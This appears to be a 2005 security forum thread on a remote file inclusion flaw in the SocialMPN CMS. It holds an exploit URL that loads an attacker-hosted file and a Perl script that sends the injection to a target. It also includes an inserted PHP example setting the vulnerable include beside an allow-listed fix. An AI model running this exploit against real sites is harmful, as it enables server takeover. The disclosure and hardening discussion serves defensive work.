IT Security and Insecurity Portal

SocialMPN
Posted: Sun Mar 06, 2005 6:45 pm
zer0-c00l
Advanced user
Joined: Jun 25, 2004
Posts: 72
Location: BRAZIL!

# SocialMPN Remote File Inclusion
# 06/03/2005
# discovered by zer0-c00l (irc.BRASnet.org at #NMAP)
# or email (lucaszero [at] gmail [dot] com)
# Versions of SocialMPN affected: All versions.
# SocialMPN official site: www.socialmpn.com (It's vulnerable too)
# PS.: A lot of sites (maybe all sites) have SafeMode in PHP.
Real Life Exploit:
http://[victim]/modules.php?name=[attacker evil file]&file=article&sid=2
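The `modules.php?name=` vector from the advisory, as an added PHP example that is neither SocialMPN's nor the poster's code: it assumes a PHP-Nuke-style dispatcher that includes `modules/<name>/index.php` (the module directory path is assumed too) and shows the unsafe include beside an allow-listed, path-checked replacement.

```php
<?php
// Added example, not SocialMPN's own code: it assumes a PHP-Nuke-style
// dispatcher in which modules.php includes modules/<name>/index.php.

// VULNERABLE (assumed shape of the original): the raw query value becomes
// the include path. With remote includes enabled (allow_url_fopen before
// PHP 5.2, allow_url_include from 5.2 on), name=http://... makes include()
// fetch and execute whatever that URL serves, under the web server's account.
function vulnerable_dispatch(): void
{
    include "modules/" . $_GET['name'] . "/index.php";
}

// HARDENED: the request is matched against the installed modules and the
// resolved path is verified before anything reaches include().
const MODULE_DIR = __DIR__ . '/modules';   // assumed layout

function resolve_module(?string $name): ?string
{
    // 1. Syntactic check: one path segment of safe characters, so no URL
    //    scheme, slash, dot or NUL byte survives.
    if ($name === null || !preg_match('/^[A-Za-z0-9_-]{1,32}$/', $name)) {
        return null;
    }
    // 2. Allow-list check: only a module that is actually installed.
    $installed = array_map('basename', glob(MODULE_DIR . '/*', GLOB_ONLYDIR) ?: []);
    if (!in_array($name, $installed, true)) {
        return null;
    }
    // 3. Defence in depth: the resolved file must stay under MODULE_DIR.
    $base = realpath(MODULE_DIR);
    $file = realpath(MODULE_DIR . '/' . $name . '/index.php');
    if ($base === false || $file === false
        || strpos($file, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $file;
}

function hardened_dispatch(): void
{
    $file = resolve_module($_GET['name'] ?? null);
    if ($file === null) {
        http_response_code(404);
        exit('Unknown module');
    }
    include $file;
}
hardened_dispatch();
```

Turning off remote includes in php.ini is still worth doing, but the allow-list is what removes the bug: the request can no longer choose the file at all.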
Posted: Mon Mar 07, 2005 4:08 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

Nice job. Have you posted a confirmation to the vendor?

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Remote Testing SocialMPN

Posted: Mon Mar 07, 2005 5:34 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

As soon as possible I've made a simple script for testing the site; I post it to Bugtraq too.
Code:
#!/usr/bin/perl -w
# Remote Testing SocialMPN Remote File Inclusion by y3dips [for testing only]
# Bug found by zer0-c00l, published at http://waraxe.us/ftopic-542-0-days0-orderasc-.html
use strict;
use LWP::UserAgent;

print " * Remote Testing File Inclusion for SocialMPN by y3dips *\n";

if (@ARGV == 2) {
    my ($target, $xploit) = @ARGV;

    my $ua = LWP::UserAgent->new;
    $ua->agent("MSIE/6.0 Windows");
    $ua->timeout(10);
    $ua->env_proxy;

    # "name" is the vulnerable parameter; the other two just select an article page.
    my $url = "http://$target/modules.php?name=$xploit&file=article&sid=2";
    my $injek = $ua->get($url);

    print " -------------------------------\n";
    if ($injek->is_success) {
        # as_string starts with the status line. Accept HTTP/1.0 and HTTP/1.1:
        # the original matched only "HTTP/1.0", so a 1.1 reply died as a failure.
        my $injekcek = $injek->as_string;
        if ($injekcek =~ /^HTTP\/1\.[01] 200 OK/) {
            print "\n This Site Maybe Vulnerable \n";
        }
        else {
            die $injek->status_line;
        }
        print " --------------------------------\n";
    }
    else {
        # Non-2xx reply: say so instead of exiting silently.
        print " Request failed: ", $injek->status_line, "\n";
    }
}
else {
    print "Gunakan: perl $0 [target] [xplo.txt] \n";
}
#EOF y3dips(c)2005

hope it helps

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Tue Mar 08, 2005 8:41 am
zrontho
Beginner
Joined: Mar 01, 2005
Posts: 3
Location: German

y3dips wrote:
> As soon as possible I've made a simple script for testing the site; I post it to Bugtraq too. Hope it helps.

Thanks a million for the sploit, but I still don't understand the sentence Gunakan in
Code: print "Gunakan: perl $0 [target] [xplo.txt] \n";
so, can you translate it to English or German, 'cause I only understand English and German.

Posted: Tue Mar 08, 2005 5:49 pm
LINUX
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman

I report all holes and the vendor fixes all bugs.

Posted: Wed Mar 09, 2005 4:40 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

zrontho wrote:
> y3dips wrote:
> > As soon as possible I've made a simple script for testing the site; I post it to Bugtraq too. Hope it helps.
> Thanks a million for the sploit, but I still don't understand the sentence Gunakan in
> Code: print "Gunakan: perl $0 [target] [xplo.txt] \n";
> so, can you translate it to English or German, 'cause I only understand English and German.

Sorry, Gunakan in English: Use.
I'm in love with my country, so I forgot to change the word. LOL

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Wed Mar 09, 2005 5:25 pm
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

LINUX wrote:
> I report all holes and the vendor fixes all bugs.

Nice response you've done there.
Even though many sites have set safemode 'ON', there are still many useful things that could inform an attacker about the site, for example: phpinfo()

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Wed Mar 09, 2005 10:16 pm
LINUX
Moderator
Joined: May 24, 2004
Posts: 404
Location: Caiman

y3dips wrote:
> LINUX wrote:
> > I report all holes and the vendor fixes all bugs.
> Nice response you've done there.
> Even though many sites have set safemode 'ON', there are still many useful things that could inform an attacker about the site, for example: phpinfo()

Safemode is not protection; I have a shell in PHP that bypasses safemode.
I discovered multiple XSS in SocialMPN and reported them to the developers, and I tested all SMPN systems; all fixed.

Posted: Fri Mar 11, 2005 1:31 am
y3dips
Valuable expert
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia

LINUX wrote:
> Safemode is not protection; I have a shell in PHP that bypasses safemode.
> I discovered multiple XSS in SocialMPN and reported them to the developers, and I tested all SMPN systems; all fixed.

Oh, I thought safemode 'on' would increase the security because (CMIIW), as I know, by enabling the safe_mode parameter, PHP scripts are able to access files only when their owner is the owner of the PHP scripts. This is one of the most "important security" mechanisms built into PHP. It effectively counteracts unauthorized attempts to access system files (e.g. /etc/passwd) and adds many restrictions that make unauthorized access more difficult. <taken from "Securing PHP: Step-by-step" by Artur Maj>

_________________ IO::y3dips->new(http://clog.ammar.web.id);

Posted: Sat Mar 12, 2005 6:57 am
zrontho
Beginner
Joined: Mar 01, 2005
Posts: 3
Location: German

y3dips wrote:
> Sorry, Gunakan in English: Use.
> I'm in love with my country, so I forgot to change the word. LOL

Thanks dude for the cool reply!!!
Keep fighting!!!!

Posted: Mon Jun 13, 2005 3:49 pm
MrCl3an
Beginner
Joined: Jun 13, 2005
Posts: 1

I appreciate the notification I received back in March about our system's vulnerabilities regarding remote file inclusion.
However, I request some help in finding a new remote file inclusion problem that has been brought to my attention. I have been told that I have 7 days to resolve this bug (not sure what will happen in 7 days, but I am expecting an exploit) and I thought I had resolved this issue back in March completely, but apparently not.
Any help in finding what problem is there would be very helpful. I can work with whomever wants to help to make our system more secure.
Thank you again for your time.

www.waraxe.us Forum Index -> Remote file inclusion